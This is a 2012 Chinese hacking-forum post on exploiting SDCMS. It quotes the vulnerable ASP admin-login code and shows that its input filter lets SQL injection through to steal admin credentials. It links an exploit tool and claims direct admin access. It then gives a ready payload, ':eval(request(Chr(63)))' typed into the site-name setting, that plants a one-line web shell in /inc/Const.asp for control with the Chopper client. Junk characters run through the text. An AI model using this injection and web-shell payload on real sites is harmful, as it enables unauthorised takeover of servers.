作者:T00LS 鬼哥- }: d4 Z. t( H$ c$ `
漏洞文件:后台目录/index.asp
% t }8 J3 u, l6 X7 ?$ i/ @: m2 X H4 x0 F
Sub Check
/ \$ l8 X% Y; O5 i+ p* t& v Dim username,password,code,getcode,Rs# P8 b1 R. b/ r: i+ P/ D k
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
/ p# W& y: D! y' E! E t9 R5 T username=FilterText(Trim(Request.Form("username")),1)
9 i5 d! D( W U8 g9 ^5 q4 p password=FilterText(Trim(Request.Form("password")),1)
! s. i6 B- E6 k6 K code=Trim(Request.Form("yzm"))
! a1 U) _- _, H getcode=Session("SDCMSCode")
8 F* n# y; ^4 o IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
0 Q" J# l+ k+ V. _- z2 x$ K( O4 R IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
+ ]- u% X. a9 G! w' z: T# L IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
5 ~) F! H" u @ ^ IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied5 j3 X% w( N3 q1 d/ W7 ^" `; r
IF username="" or password="" Then
6 l2 l7 H$ r$ k8 p/ x) |9 @ Echo "用户名或密码不能为空"ied* J2 |; k" A- B9 p' X8 }
Else
. ?3 H& M. ~4 c4 q Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
; j6 V, D$ L" F- X+ ^4 r/ u IF Rs.Eof Then6 F5 q( l7 h) }8 w
AddLog username,GetIp,"登录失败",18 [9 v/ B, f, E0 q: }5 {5 N
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
8 H# ^/ I/ V$ }" c4 J Else
6 }/ f/ e3 M- W8 u9 h% }2 N! V Add_Cookies "sdcms_id",Rs(0)3 B' ^6 }3 p, j f4 M( j7 q
Add_Cookies "sdcms_name",username
& x) E* S0 x6 }1 Q* k6 \ Add_Cookies "sdcms_pwd",Rs(2)
1 Z! H) l" r; H. i, F% T Add_Cookies "sdcms_admin",Rs(3) |" [+ t& p+ X/ I# y3 f
Add_Cookies "sdcms_alllever",Rs(4)8 N6 K) O# h: e3 U
Add_Cookies "sdcms_infolever",Rs(5)5 m/ X5 | c( R/ `% X* e* x
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
" c' ^; I/ ?5 z' J AddLog username,GetIp,"登录成功",1
% z2 g6 s! @! w, d0 G8 q '自动删除30天前的Log记录6 Y$ s& `' Z6 V( e |6 w h: p
IF Sdcms_DataType Then0 F$ i) P4 b" T& x" h2 }$ U1 R
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")+ B( j, e) ^" `/ \5 N
Else+ E" {. W% w2 z( T
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")3 `" l# I' ]3 |/ w
End IF
z( E7 T! N1 B. O6 ~ Go("sdcms_index.asp")
8 z; I0 [( v- x. p9 u+ n2 [ { End IF8 `: k! a6 v" Z4 p: i6 q
Rs.Close/ Z7 K' l6 I- c
Set Rs=Nothing
$ [4 w; U' k4 D t' b4 l. m End IF
/ v, m9 n9 K5 z2 }+ CEnd Sub$ f2 S. O- H1 o. K
/ p. j4 F4 O0 G
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码4 x% Y# `0 q8 o3 Z& g
$ C' D& N' I, L5 [, q T' bFunction FilterText(ByVal t0,ByVal t1)5 A+ a5 x: @' Y. D( p$ r( W
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function) a9 t6 S p/ u) v0 a4 T% p8 N( R
t0=Trim(t0)4 Y. y3 B3 N, ^% a
Select Case t1
# d+ y7 G# y, b Case "1"0 f! s$ K v& ^5 R; ^) y' ~
t0=Replace(t0,Chr(32),"")
+ y k& q4 Y7 Z2 m: O t0=Replace(t0,Chr(13),"")4 L) L# _4 |( y4 c
t0=Replace(t0,Chr(10)&Chr(10),"")
( c: N6 H' w6 @8 O t0=Replace(t0,Chr(10),"")
/ C4 m7 a8 b4 R! b6 F Case "2"
( T, k- N' Q" r i t0=Replace(t0,Chr(8),"")'回格
f1 C$ c% }- ]) t0 K t0=Replace(t0,Chr(9),"")'tab(水平制表符)
3 [0 q: N/ S3 r1 R5 j; g t0=Replace(t0,Chr(10),"")'换行+ p8 g* ?! c/ ^) m
t0=Replace(t0,Chr(11),"")'tab(垂直制表符). j8 J( P% s' K+ }5 _# u
t0=Replace(t0,Chr(12),"")'换页
$ l( I! l* P ~; E2 Z- D t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合, M: @, ~; o# r; g q* C
t0=Replace(t0,Chr(22),"")
X* a- F# j) ?. ] t0=Replace(t0,Chr(32),"")'空格 SPACE
8 g$ x' d+ @, W" I% l, ?2 m) [ t0=Replace(t0,Chr(33),"")'!
- U* l3 E8 Z; Y8 L t0=Replace(t0,Chr(34),"")'"3 g. _- G1 V0 w L
t0=Replace(t0,Chr(35),"")'#! r& d7 c0 r( W
t0=Replace(t0,Chr(36),"")'$' @$ F I6 U% [% P* T' U5 N
t0=Replace(t0,Chr(37),"")'%
$ A* S! d7 a7 B# Y! o& Z t0=Replace(t0,Chr(38),"")'&' E5 h) |) A2 N( t) j5 f: o
t0=Replace(t0,Chr(39),"")''
7 i5 p2 W/ `; R- I% y t0=Replace(t0,Chr(40),"")'(
2 m* C' m. a$ C; d* q8 h t0=Replace(t0,Chr(41),"")'); X/ u0 w+ _( i
t0=Replace(t0,Chr(42),"")'*
4 {( u1 k# T& y7 V! R$ W8 m t0=Replace(t0,Chr(43),"")'+
& D4 l* H7 \4 [; ^ t0=Replace(t0,Chr(44),"")',: y- y) Q6 C" q, e3 z! ^( n( T* v$ l6 D
t0=Replace(t0,Chr(45),"")'-
) Y4 y8 g$ k+ g# p# _' e t0=Replace(t0,Chr(46),"")'.& U+ \0 k7 a( W6 b( ^
t0=Replace(t0,Chr(47),"")'/
" p& e3 V* h5 ~* h; _ t0=Replace(t0,Chr(58),"")': Y/ j1 C0 `: w3 I0 D/ C
t0=Replace(t0,Chr(59),"")';/ A: n& k' Y) s* H$ g# P" w: v
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>7 d: H- i$ t# @( P4 O
t0=Replace(t0,Chr(63),"")'?
. s) u; m1 z; j) L8 {; q t0=Replace(t0,Chr(64),"")'@
( w8 h: |/ [- |8 m( G t0=Replace(t0,Chr(91),"")'\
9 n- M/ T( t6 }5 ~1 E0 ` t0=Replace(t0,Chr(92),"")'\
' ]1 I* Z: L3 c( H6 @, } t0=Replace(t0,Chr(93),"")']
. R2 E* |6 M, t' ?9 q1 v t0=Replace(t0,Chr(94),"")'^8 G0 E. D! q3 c* P+ \( d/ s
t0=Replace(t0,Chr(95),"")'_
' {$ Y, A* w9 U+ a; G t0=Replace(t0,Chr(96),"")'`* O [( n/ V, d" P8 R' i) g
t0=Replace(t0,Chr(123),"")'{; f: V$ n6 v d7 n/ x
t0=Replace(t0,Chr(124),"")'|# m; S3 N$ s9 ?0 ] F7 h+ [
t0=Replace(t0,Chr(125),"")'}9 E8 O& Y* D) {, h! I: b* O4 s- L3 b
t0=Replace(t0,Chr(126),"")'~/ ^& w$ J. o" K
Case Else0 a3 d# F: H* J
t0=Replace(t0, "&", "&")
8 q \) A" P7 ]6 p2 A% t t0=Replace(t0, "'", "'")
5 k3 `3 \# L% G: f+ h* l t0=Replace(t0, """", """)
1 u9 }( @ V1 ]$ y9 A6 c/ C t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")- S7 c2 E/ L: D3 ^5 d) z
End Select
x6 O9 X7 Z1 V0 P IF Instr(Lcase(t0),"expression")>0 Then
! `/ b* Z% u" l* h0 D3 z t0=Replace(t0,"expression","e­xpression", 1, -1, 0)2 _& p$ L, L q8 g3 t
End If/ B/ P- i" D. h2 ^2 ~* L& w3 r$ e
FilterText=t0
; K+ q0 J9 [& ^: XEnd Function+ V, u- z- F$ U X
' M9 k. n$ h5 \" }
看到没。直接参数是1 只过滤
; R! K. r. a1 X0 }- J t0=Replace(t0,Chr(32)," ")
% t0 B% M" D" m- s7 }( S' a# ^& R# Q t0=Replace(t0,Chr(13),"")
; x2 `8 W4 k/ z/ o' y* t t0=Replace(t0,Chr(10)&Chr(10),"
& o1 w2 w- N; e$ _% p6 ?")
$ q: d2 n$ J, H7 d+ |1 ? t0=Replace(t0,Chr(10),"% a, q7 L7 v, Y7 Y
")& _% c+ D( b7 s4 ^. k
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!/ w( @* R5 I0 D1 ^/ Y
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
3 t2 B" \% s' x6 T9 L. L
4 z, i9 F" U7 l5 k, P测试:6 |' ]* e0 {. c1 M9 V h
+ P" r, K# b( R
) R3 N# a( N. ~现在输入工具上验证码,然后点OK
' T$ w' f; B0 D5 K" @8 P
4 `7 m z- c4 j* a0 z( C" W* j( @
5 H& v, ]2 L( W1 Z: R看到我们直接进入后台管理界面了,呵呵!8 A" \8 z7 C" U- k$ H* a
+ `0 P3 V( }! m. @
7 ^7 p& y0 v" C+ Y, m, `! {' M& n, W. a1 i* x' `+ g. O* j' i; t2 g
这样直接进入后台了。。。。
7 k. u/ z/ ], {6 u3 d w+ g2 e" U m9 s. _7 [+ w8 h* e
) O/ Y' s+ ~" ^0 t# b4 G+ j& ]2 \+ n" V* U
SDCMS提权:
% x+ W& C" ]1 @1 Q! o
& o' Z. H% z }* T方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?( i( @5 P! V5 P% D; t- W8 j# `
" ^, [5 m6 X8 D$ U# N9 f( z, v
* h( b% {. ^0 @: i% @) `
. u) r& {% G7 K) sOK,现在用菜刀连接下!6 s7 E- [" l9 V2 |% [3 K
1 j: A4 x7 O* W$ v" {# d" T6 G( m, Z
5 ~: q8 z0 n& s2 c% U- Y( \: e1 e$ Q5 ~* T- J. |
/ X5 o9 a6 l: e& G
# L* M5 P) R" Z2 t |
发表于 2012-11-9 20:57:02
收藏
支持
反对